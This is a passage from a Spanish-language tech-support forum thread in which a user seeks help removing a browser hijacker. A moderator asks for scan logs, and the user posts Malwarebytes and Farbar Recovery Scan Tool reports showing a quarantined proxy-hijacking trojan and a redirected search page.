      O23 - Service: @%systemroot%\system32\mmcss.dll,-102 (THREADORDER) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%windir%\system32\TimeBrokerServer.dll,-1001 (TimeBroker) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\trkwks.dll,-1 (TrkWks) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\WINDOWS\servicing\TrustedInstaller.exe
      O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\umrdp.dll,-1000 (UmRdpService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\upnphost.dll,-213 (upnphost) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
      O23 - Service: @%systemroot%\system32\vmicres.dll,-801 (vmicguestinterface) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-101 (vmicheartbeat) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-201 (vmickvpexchange) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-601 (vmicrdv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-301 (vmicshutdown) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-401 (vmictimesync) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-501 (vmicvss) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\w32time.dll,-200 (W32Time) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
      O23 - Service: @%systemroot%\system32\wbiosrvc.dll,-100 (WbioSrvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wcmsvc.dll,-4097 (Wcmsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wcncsvc.dll,-3 (wcncsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\WcsPlugInService.dll,-200 (WcsPlugInService) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wdi.dll,-502 (WdiServiceHost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\wdi.dll,-500 (WdiSystemHost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
      O23 - Service: @%systemroot%\system32\webclnt.dll,-100 (WebClient) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wecsvc.dll,-200 (Wecsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wephostsvc.dll,-100 (WEPHOSTSVC) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wercplsupport.dll,-101 (wercplsupport) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wersvc.dll,-100 (WerSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wiarpc.dll,-2 (WiaRpc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\winhttp.dll,-100 (WinHttpAutoProxySvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wbem\wmisvc.dll,-205 (Winmgmt) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wsmsvc.dll,-101 (WinRM) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wlansvc.dll,-257 (WlanSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wlidsvc.dll,-100 (wlidsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
      O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
      O23 - Service: @%systemroot%\system32\workfolderssvc.dll,-102 (workfolderssvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wpcsvc.dll,-100 (WPCSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wpdbusenum.dll,-100 (WPDBusEnum) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wscsvc.dll,-200 (wscsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\SearchIndexer.exe,-103 (WSearch) - Unknown owner - C:\WINDOWS\system32\SearchIndexer.exe
      O23 - Service: @%SystemRoot%\system32\WSService.dll,-103 (WSService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\wuaueng.dll,-105 (wuauserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wudfsvc.dll,-1000 (wudfsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wwansvc.dll,-257 (WwanSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe

      --
      End of file - 32257 bytes

    2. #2
      Moderadora Gral.
      Avatar de @Daniela
      Registrado
      abr 2011
      Ubicación
      España
      Mensajes
      23.121

      Re: Eliminar qtipr.com

      Hola Darkor

      Pon los reportes de Malwarebytes y AdwCleaner para revisarlos.

      Descarga Farbar Recovery Scan Tool segun la arquitectura de tu sistema (32 o 64 bits)

      • La guardas en el escritorio >> Esto es muy importante..
      • Doble clic para ejecutar Frst.exe. (Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")
      • En la ventana del Disclaimer, presiona Yes.

      • En la nueva ventana que se abre, presiona el botón Scan y espera paciente a que concluya el análisis.
      • Se abrirán dos (2) archivos (Logs), Frst.txt y Addition.txt, estos estarán grabados en tu escritorio.

      • Para terminar abres los archivos Frst.txt y Addition.Txt copia y pega todo su contenido en tu próxima respuesta. Utiliza dos mensajes si te dice que es muy largo.


      Un saludo
      ✿◕‿◕✿ La impaciencia no es buena compañía ✿◕‿◕✿

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    3. #3
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Re: Eliminar qtipr.com

      Gracias por responderme.

      Hice dos análisis de hoy con Malwarebytes. El primero es este donde encontró amenazas que puso en cuarentena y ahí siguen.

      Primer análisis con Malwarebytes

      Malwarebytes
      www.malwarebytes.com

      -Detalles del registro-
      Fecha del análisis: 16/2/17
      Hora del análisis: 21:35
      Archivo de registro: malwareanalisis.txt
      Administrador: Sí

      -Información del software-
      Versión: 3.0.6.1469
      Versión de los componentes: 1.0.50
      Versión del paquete de actualización: 1.0.1281
      Licencia: Premium

      -Información del sistema-
      SO: Windows 8.1
      CPU: x64
      Sistema de archivos: NTFS
      Usuario: ALBERTO\Alberto

      -Resumen del análisis-
      Tipo de análisis: Análisis rápido
      Resultado: Completado
      Objetos analizados: 1983
      Tiempo transcurrido: 0 min, 22 seg

      -Opciones de análisis-
      Memoria: Activado
      Inicio: Desactivado
      Sistema de archivos: Desactivado
      Archivo: Activado
      Rootkits: Desactivado
      Heurística: Desactivado
      PUP: Activado
      PUM: Activado

      -Detalles del análisis-
      Proceso: 0
      (No hay elementos maliciosos detectados)

      Módulo: 1
      Trojan.ProxyHijacker, C:\USERS\ALBERTO\APPDATA\LOCAL\GDNBKL.DLL, En cuarentena, [517], [371698],1.0.1281

      Clave del registro: 1
      Trojan.ProxyHijacker, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, En cuarentena, [517], [-1],0.0.0

      Valor del registro: 6
      Trojan.ProxyHijacker, HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|gdnbkl, En cuarentena, [517], [371698],1.0.1281
      Trojan.ProxyHijacker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0

      Datos del registro: 0
      (No hay elementos maliciosos detectados)

      Secuencia de datos: 0
      (No hay elementos maliciosos detectados)

      Carpeta: 0
      (No hay elementos maliciosos detectados)

      Archivo: 1
      Trojan.ProxyHijacker, C:\USERS\ALBERTO\APPDATA\LOCAL\GDNBKL.DLL, En cuarentena, [517], [371698],1.0.1281

      Sector físico: 0
      (No hay elementos maliciosos detectados)


      (end)

      Segundo análisis con Malwarebytes

      Malwarebytes
      www.malwarebytes.com

      -Detalles del registro-
      Fecha del análisis: 16/2/17
      Hora del análisis: 22:56
      Archivo de registro: malwareanalisis2.txt
      Administrador: Sí

      -Información del software-
      Versión: 3.0.6.1469
      Versión de los componentes: 1.0.50
      Versión del paquete de actualización: 1.0.1281
      Licencia: Premium

      -Información del sistema-
      SO: Windows 8.1
      CPU: x64
      Sistema de archivos: NTFS
      Usuario: ALBERTO\Alberto

      -Resumen del análisis-
      Tipo de análisis: Análisis rápido
      Resultado: Completado
      Objetos analizados: 2169
      Tiempo transcurrido: 0 min, 44 seg

      -Opciones de análisis-
      Memoria: Activado
      Inicio: Desactivado
      Sistema de archivos: Desactivado
      Archivo: Activado
      Rootkits: Desactivado
      Heurística: Desactivado
      PUP: Activado
      PUM: Activado

      -Detalles del análisis-
      Proceso: 0
      (No hay elementos maliciosos detectados)

      Módulo: 0
      (No hay elementos maliciosos detectados)

      Clave del registro: 0
      (No hay elementos maliciosos detectados)

      Valor del registro: 0
      (No hay elementos maliciosos detectados)

      Datos del registro: 0
      (No hay elementos maliciosos detectados)

      Secuencia de datos: 0
      (No hay elementos maliciosos detectados)

      Carpeta: 0
      (No hay elementos maliciosos detectados)

      Archivo: 0
      (No hay elementos maliciosos detectados)

      Sector físico: 0
      (No hay elementos maliciosos detectados)


      (end)

      Análisis con Farbar Recovery

      Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-02-2017 02
      Ran by Alberto (administrator) on ALBERTO (16-02-2017 23:02:14)
      Running from C:\Users\Alberto\Desktop
      Loaded Profiles: Alberto (Available Profiles: Alberto)
      Platform: Windows 8.1 (Update) (X64) Language: Español (España, internacional)
      Internet Explorer Version 11 (Default browser: IE)
      Boot Mode: Normal
      Tutorial for Farbar Recovery Scan Tool: ***********************************************************************************************************

      ==================== Processes (Whitelisted) =================

      (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

      (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
      (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
      (Microsoft Corporation) C:\Windows\System32\wlanext.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
      (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
      () C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTDevMgr.exe
      (Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
      (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
      (LENOVO INCORPORATED.) C:\Program Files\Lenovo\iMController\SystemAgentService.exe
      (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
      (Realtek Semiconductor Corporation) C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTServer.exe
      (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
      (CyberLink Corp.) C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.exe
      (Intel Corporation) C:\Windows\System32\igfxtray.exe
      (Intel Corporation) C:\Windows\System32\hkcmd.exe
      (Intel Corporation) C:\Windows\System32\igfxpers.exe
      (Intel Corporation) C:\Windows\System32\igfxsrvc.exe
      (Realtek semiconductor) C:\Windows\RTFTrack.exe
      (Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
      () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
      (Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
      (Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
      (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe
      (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
      (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
      () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
      (Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
      (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\CCLibrary.exe
      (Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\libs\node.exe
      (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
      (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
      (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
      (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
      (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

      ==================== Registry (Whitelisted) ====================

      (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

      HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
      HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
      HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891080 2013-10-17] (ELAN Microelectronics Corp.)
      HKLM\...\Run: [BtServer] => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe [216064 2014-01-06] (Realtek Semiconductor Corporation)
      HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-12-23] (Realtek semiconductor)
      HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [907480 2013-09-04] (Conexant Systems, Inc.)
      HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
      HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1647616 2012-06-13] (Conexant Systems, Inc.)
      HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [15813616 2014-05-09] (Lenovo(beijing) Limited)
      HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2014-05-09] (Lenovo(beijing) Limited)
      HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403288 2014-08-09] (NVIDIA Corporation)
      HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
      HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
      HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
      HKLM-x32\...\Run: [UpdateP2GShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06] (CyberLink Corp.)
      HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
      HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
      HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
      HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
      HKLM-x32\...\Run: [] => [X]
      HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2384984 2016-12-09] (Adobe Systems Incorporated)
      Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [AdobeBridge] => [X]
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Power2GoExpress] => NA
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-07-21] (Hewlett-Packard Development Company, LP)
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [TalkHelper] => "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9363672 2017-02-08] (Piriform Ltd)
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      Startup: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk [2016-01-29]
      ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

      ==================== Internet (Whitelisted) ====================

      (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

      Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
      Tcpip\Parameters: [DhcpNameServer] 212.40.224.73 62.42.230.24
      Tcpip\..\Interfaces\{1FC9537B-D9EE-484F-8717-EBB24723B0F6}: [DhcpNameServer] 212.40.224.73 62.42.230.24
      Tcpip\..\Interfaces\{7E1BA411-4F4C-49BD-B8C1-A175BEF666A0}: [DhcpNameServer] 172.16.136.2
      Tcpip\..\Interfaces\{CD4BB8C7-8D07-490D-A1EF-88B67DEA2363}: [DhcpNameServer] 212.40.224.73 62.42.230.24

      Internet Explorer:
      ==================
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
      HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKLM-x32 -> DefaultScope value is missing
      SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3C} URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q=
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {404BAF98-F2E7-4183-8931-01C1F576C860} URL = hxxp://www.google.com/search?q={searchTerms}
      BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
